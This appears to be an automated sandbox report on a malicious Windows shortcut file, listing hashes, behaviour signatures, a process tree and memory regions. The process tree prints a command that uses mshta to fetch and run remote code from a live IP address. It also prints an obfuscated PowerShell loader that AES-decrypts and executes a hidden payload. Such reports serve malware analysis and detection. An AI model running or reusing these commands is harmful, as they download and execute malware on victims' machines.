Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    16/03/2024, 02:25

General

  • Target

    6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk

  • Size

    1KB

  • MD5

    90a6eed71981efdcdbc0c8c0151cfb0e

  • SHA1

    c21e13a29ad18e73b88eddec919b85925a95952a

  • SHA256

    6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd

  • SHA512

    fa7b96a7e404dc187d43f04ccd55637a959fbb7950d6b69e80539b4026cfd62460a74330dadb2a8e1578ddf0b87f31a4c8bac6451bd57130aa90f5a5bce77bbd

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://89.23.98.210/qqeng

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://89.23.98.210/qqeng
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta http://89.23.98.210/qqeng
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" http://89.23.98.210/qqeng
          4⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function vTMsUbI($pvPiSaK){return -split ($pvPiSaK -replace '..', '0x$& ')};$DDZuEbM = vTMsUbI('2EEA8941C1967724856754736159546956BD49A37C0FCCCC019A7902B2F7377223351478D94095CAB7F7575DB48B7888E05DA126156BA4D512049E30C56AB0565023B79613557DF933D7654B2EEFD5218913F64CC80EF58C759DA922A382A9F9A5D83DC2AA6C54F49ABE564470BBA07A95B3416A8E37F7BB5B0FF8C667135BCBDFB64E76FE8C20111234D21AF3B82F2237F9CD00D57356B8C20C45A93686D00D03286206824363AC9ABAE755EB081D827B4A8138B72E5B6B1B696C8CBAE0AB54E1ECB9BCA2DFE6AA14701349B851719FDA148BF227D2CBB1C70AC777C3246A66EB70A75BA2AC17565608748CBC6EDCCFB5B4C9F86D764406F66EFFB2CA141F284F0A7B88E1AE815F89D9252C8E77FD111E7C2F8EB1DC66C76589BAAC727BFB1EDB021E932342EB72DB318BC4A36179C0C5CF70795D0761138A36C1BD37F278A2F571C09575FFC57DEDCF79AE87941DD0BB334EC92CE64D0C8B518903BBAF7155856A83AA9286B06310D255390073E2997DB6E4763BAE864A70DF2B8300547E678644A0B2B4A91BDA0555C692CD3904B199D217D897111CB7F9E20B1C642CB25C7CCE304AAEE359D2595B3D645856E55E04E714B742BB20DD1876139871A9153834A9D96EFE8624F133EA968FF954305F71718E3BAF50BB06EF8F569D25916E4200F6DAA51DD582D0BB183265769AE45B65D59D6DAAD7D24388BC64D566198E072D0684E4A812BED119309279C01830EA4E22E0E986D31CEF7C2A700A8860377F82BC47D36C767CA408D9C9EB6C2F45F66977D04AFE326DDC0349467A342F62699007388135B07AA4A3C9019547CD4F348742E84D2EC52340910278A84BA8A79E9A40AD813D15A4D628EEEBC475733001FDC044E047CAF13540A9C3127CCCA3F27E1FDF7B392CB2AFF6D00F3D36780B548D34602D6FC9714FAA16A624B97A4AAE866B52AA4F3F992E8B73898C34BCCCDB749C0A9602E48CDCC658D9840E9FB0EC44141AADBA92D91C4CC33ECEB4B6A86B4EAB0B25DC950CDA05E4D43AADF3D92985943BA62086C4B8D487537FE589F1F86DFE1E7B7A78E8AF805F5F7C5D7B926FEB19EC212C031070A6E2745D694DD20D2CE59890EBE872C21AB5235BCA04472BE83CDF4B3825BC71CC8A1E9BEA7859DD5A23AE2BD3B6F36DF855487C05821BAFD97441F735A6A921F28249609AC3E67D699D5E691B0FD73FD15B7819E12284442C8F5EAE6BF01E542BAC9F4853D0EEFD36A521FF58A4F23B2612FB6BDA486C8B8B497AA1471320DF6CC59937B1AC74C7D939F4296E35EC04371B6B1401301D99D69CB90D4686D5C63B8B7DC8C11203511BA49E3CD22CD1B2BDF5A8207B116910025C662F5884F0465307EF278D916CDCA3FD86783830357C61D49FA6EF0C097BB53CA6300C557B64244311063A75A15B5621B8B30428F23AE2772668FC4CC6DAC4C28BFC76AA0EA698F79268317615CB97634D83EB1F8FBA3FF8C7EC2205F2B1EE5405B956543AAD2D06D64A95BE72B8E9AC61C785252BE6796AA0F0E709658F47D14139F1F35B520C3F9C5EC5A18A24C3584A73023AA3D65AC32EB0508B26A071FD8AE3D9E3BDD8A213A36B377007FADCAC3201CEB3854AB367857AABB136AFD2969226C750E0B89BF2A1C07B32D69B3094E4107552C4AA703D7F7F2EB800A4B0278DB696236D319D809E1E385510F3D69EDA54A6E1086F8109F4C3DB962DFCC471A47F9081EDB814AD5D135FFA05FA684E4D391AA0D1BA4C37C1271DD00A69F6879455E63626F084172FA8F3D95F6A');$bftik = [System.Security.Cryptography.Aes]::Create();$bftik.Key = vTMsUbI('55676E624475754F69737A6879546E70');$bftik.IV = New-Object byte[] 16;$lJcHtpBA = $bftik.CreateDecryptor();$UZsjRnWNL = $lJcHtpBA.TransformFinalBlock($DDZuEbM, 0, $DDZuEbM.Length);$UVWwHyrcG = [System.Text.Encoding]::Utf8.GetString($UZsjRnWNL);$lJcHtpBA.Dispose();& $UVWwHyrcG.Substring(0,3) $UVWwHyrcG.Substring(3)
            5⤵
            • Blocklisted process makes network request
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    2877d5092f7f51adfea48540a189ff30

    SHA1

    5d27075ccc2aab431c8733df6384090898a06a82

    SHA256

    499fd9bc92a9688afdf07a00fe652e50a5c590ca9e533f0b7f5da9991624fd3f

    SHA512

    63c93e4aabb39b260aa071eac74ff07f0e1687628eb880734bc5c17f6aa46e3aed6b0b4cc8cd3420093c20e48f65a778ff4f309fc9f4cba8a8a0590417aea56b

  • memory/2752-55-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-59-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-63-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-62-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-61-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-58-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-54-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

  • memory/2752-60-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-56-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-57-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

  • memory/2792-43-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-40-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2792-42-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-47-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-46-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-44-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-45-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-41-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB